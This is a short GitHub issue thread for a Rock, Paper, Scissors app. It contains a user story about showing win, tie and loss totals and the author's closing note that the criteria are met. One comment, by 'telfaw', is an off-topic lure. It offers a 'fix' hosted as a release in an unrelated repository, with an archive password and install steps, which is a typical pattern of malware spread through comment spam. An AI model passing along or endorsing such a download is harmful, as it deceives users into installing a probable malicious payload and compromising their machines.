### ISSUE TITLE
Totals

### ISSUE THREAD

**Issue by ShaneLeeJohnson** [ShaneLeeJohnson/Rock-Paper-Scissors#4]
# Totals

## User Story
AS A fan of Rock, Paper, Scissors
I WANT to create a rock, paper, scissors app,
SO THAT I can play against a computer opponent whenever I want.

## Acceptance Criteria
GIVEN THAT I want to create a Rock, Paper, Scissors app,
WHEN I finish a round of the game,
THEN I see my total wins, ties, and losses.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ShaneLeeJohnson** [comment]
Application now meets all acceptance criteria
